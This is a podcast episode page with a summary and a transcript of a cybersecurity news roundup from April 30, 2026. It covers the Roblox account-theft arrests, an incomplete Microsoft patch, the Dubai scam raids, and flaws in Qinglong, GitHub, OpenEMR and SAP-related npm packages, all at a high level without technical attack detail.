Cybersecurity Headlines
Cybersecurity Headlines

Roblox hackers arrested, Microsoft 0-day falls short, Dubai scam takedown

7 min
Apr 30, 2026about 1 month ago
Listen to Episode
Summary

This episode covers major cybersecurity incidents including the arrest of Ukrainian hackers selling 610,000 compromised Roblox accounts, Microsoft's incomplete zero-day patch for Windows Shell, a joint U.S.-China operation dismantling Dubai-based cryptocurrency scam centers, and multiple supply chain and vulnerability discoveries affecting enterprise systems.

Insights
  • Incomplete security patches create persistent vulnerabilities: Microsoft's February fix for a zero-day left a credential theft vector exploitable by APT28, requiring a May 12 remediation deadline
  • AI-powered security tools are accelerating both vulnerability discovery and exploitation: 81% of teams report AI-generated code introduces new vulnerabilities while AI tools discover flaws in days vs. months
  • Supply chain attacks are evolving with sophisticated persistence: SAP NPM packages used malicious pre-install scripts to harvest developer credentials and self-propagate through poisoned dependencies
  • International law enforcement coordination is becoming critical: U.S.-China joint operations and Ukrainian arrests demonstrate coordinated efforts against cybercrime, though state-aligned concerns persist
  • Legacy protocol deprecation remains a significant operational challenge: Microsoft's TLS 1.0/1.1 blocking in Exchange Online will disrupt organizations still using older clients and devices
Trends
AI-accelerated vulnerability discovery creating pressure for rapid remediation cyclesSupply chain attacks targeting developer tools and credentials as high-value vectorsInternational law enforcement coordination against cybercrime and state-backed groupsIncomplete security patches leaving exploitable gaps despite vendor remediation effortsLegacy protocol and authentication standard deprecation forcing enterprise modernizationCryptocurrency-related fraud and scams as persistent billion-dollar threat to consumersInfo-stealing malware disguised as legitimate tools targeting gaming and consumer platformsLateral movement and credential theft as primary attack objectives post-initial compromiseOpen-source and open-source-adjacent platforms as vulnerability discovery targetsAI-driven reverse engineering reducing time to vulnerability discovery from months to days
Companies
Microsoft
Issued incomplete zero-day patch for Windows Shell flaw exploited by APT28; blocking TLS 1.0/1.1 in Exchange Online
Roblox
610,000 user accounts hijacked and sold by Ukrainian hackers using info-stealing malware disguised as game tools
Meta
Provided data to U.S. and Chinese law enforcement for Dubai scam center investigation and arrests
GitHub
Disclosed high-severity RCE vulnerability in repository push access via unsanitized metadata injection
OpenEMR
Electronic health record platform with 38 previously unknown vulnerabilities including SQL injection and XSS flaws
Wiz
Security firm that discovered GitHub vulnerability using AI-powered reverse engineering tool in under 48 hours
Qinglong
Task scheduler software with authentication bypass flaws exploited for remote code execution and crypto mining
SAP
NPM packages related to SAP compromised in supply chain attack inserting credential-stealing malware
CISA
Added Microsoft Windows Shell zero-day to known exploited vulnerabilities list with May 12 remediation deadline
Aisle
Security firm that identified 38 vulnerabilities in OpenEMR platform using AI-driven scanning in three months
People
Sarah Lane
Presented cybersecurity headlines episode covering major incidents and vulnerabilities
Quotes
"While 96% of teams now use AI tools, 81% report that AI-generated code has introduced new vulnerabilities into their mobile apps."
Sarah LaneMid-episode
"The bugs stem from mismatches in routing and authentication logic, allowing unauthorized access to admin endpoints"
Sarah LaneQinglong segment
"Exploitation began before disclosure, and while initial patches were incomplete, a later fix addressed the root cause"
Sarah LaneQinglong segment
Full Transcript
From the CISO series, it's cybersecurity headlines. These are the cybersecurity headlines for Thursday, April 30th, 2026. I'm Sarah Lane. Hackers arrested for selling Roblox accounts. Ukrainian authorities arrested three individuals for hijacking more than 610,000 Roblox accounts using info-stealing malware disguised as game enhancement tools. The attackers harvested credentials, sorted accounts by value, including at least 357 high-value profiles, and sold them through Russian platforms, generating around $225,000. Police seized devices and cash during raids, and the suspects now face up to 15 years in prison, as investigators look for additional victims and accomplices. Microsoft's patch for a zero day falls short. Microsoft and CISA warn that attackers are exploiting a zero-click Windows shell flaw created by an incomplete fix for an earlier vulnerability used by Russian state-backed group APT28. The bug allows credential theft via forced authentication, exposing net NTL MV2 hashes that can be used to access sensitive data and move laterally on networks, even after Microsoft's February patches blocked the original remote code execution chain. CISA has added the flaw to its known exploited vulnerabilities list with a May 12 remediation deadline. U.S. and China partner on Dubai's scam takedown. A joint U and Chinese law enforcement operation raided nine scam centers in Dubai resulting in 276 arrests tied to cryptocurrency pig butchering schemes that defrauded American victims Investigators traced the networks using data from Meta, financial records, and blockchain analysis, leading to charges against several organizers accused of running front companies coordinating the scams. This is part of a broader U.S. effort to combat cyber fraud, which cost Americans $16 billion last year. Concerns remain over links between Chinese criminal groups and state-aligned economic activity. Hackers exploit RCE flaws in Qinglong. Attackers are exploiting two authentication bypass flaws in the Qinglong task scheduler to achieve remote code execution and deploy crypto miners on exposed servers. The bugs stem from mismatches in routing and authentication logic, allowing unauthorized access to admin endpoints and enabling attackers to inject malicious commands that install high-CPU mining processes disguised as legitimate system activity. Exploitation began before disclosure, and while initial patches were incomplete, a later fix addressed the root cause as infection spread across multiple environments. Huge thanks to our sponsor, GuardSquare. AI is speeding up development, but at what cost? While 96% of teams now use AI tools, 81% report that AI-generated code has introduced new vulnerabilities into their mobile apps. In a world with automated threats, you need multi-layered, polymorphic security to stay ahead of the curve. Learn more at guardsquare Reverse engineering unearths GitHub bug GitHub disclosed a high severity flaw that could let attackers with repository push access achieve remote code execution by injecting malicious metadata through unsanitized input. The issue was discovered by Wiz using an AI-powered reverse engineering tool that analyzed closed source binaries, reducing what would have taken months to under 48 hours. GitHub patched cloud instances with no evidence of exploitation, but many on-premise enterprise server deployments remained vulnerable. Exchange Online blocks old TLS versions. Microsoft will start blocking TLS 1.0 and 1.1 connections to Exchange Online for POP3 and IMAP4 starting in July. fully ending support for the deprecated protocols. The move follows years of warnings, with most traffic already using TLS 1.2 or higher, though legacy clients and devices that opted into older endpoints could still face disruptions. The change reflects broader industry efforts to phase out insecure encryption standards, and unsurprisingly, Microsoft is pushing customers towards more modern protocols. Flaws found in electronic health record platform. An AI-driven scan of the open EMR platform uncovered 38 previously unknown vulnerabilities, including SQL injection, authorization bypass, and XSS flaws that could enable database compromise, patient data theft, and remote code execution. Security firm Aisle identified the issues in three months and provided fixes, all of which have now been patched with OpenEMR integrating the AI tool into its development workflow AI is accelerating vulnerability discovery but also increasing pressure on defenders to rapidly triage and remediate risks. SAP-related NPM packages compromised. Multiple SAP-related NPM packages were compromised in a supply chain attack that inserted credential-stealing malware via malicious pre-install scripts. The payload harvested developer credentials, cloud secrets, and tokens, exfiltrating them through victim-controlled GitHub repositories while also self-propagating by poisoning other packages and injecting malicious workflows. The attack exploited gaps in NPM's OIDC-trusted publishing and introduced new persistent techniques targeting AI coding tools, with maintainers now releasing clean versions to replace the infected packages. Every organization wants to be able to recover from a ransomware attack. So why does no one seem to test properly for it? That is what we're trying to figure out on the latest episode of Defense In Depth. Look for the episode, How Do You Know If Your Backups Will Survive a Ransomware Attack? Wherever you get your podcasts. And if you have thoughts on the news from today or about our show in general, be sure to reach out. Feedback at CISOseries.com. We'd love to hear from you. I am Sarah Lane reporting for the CISO Series. You stay classy and safe out there. Cybersecurity headlines are available every weekday. Head to CISOseries.com for the full stories behind the headlines. you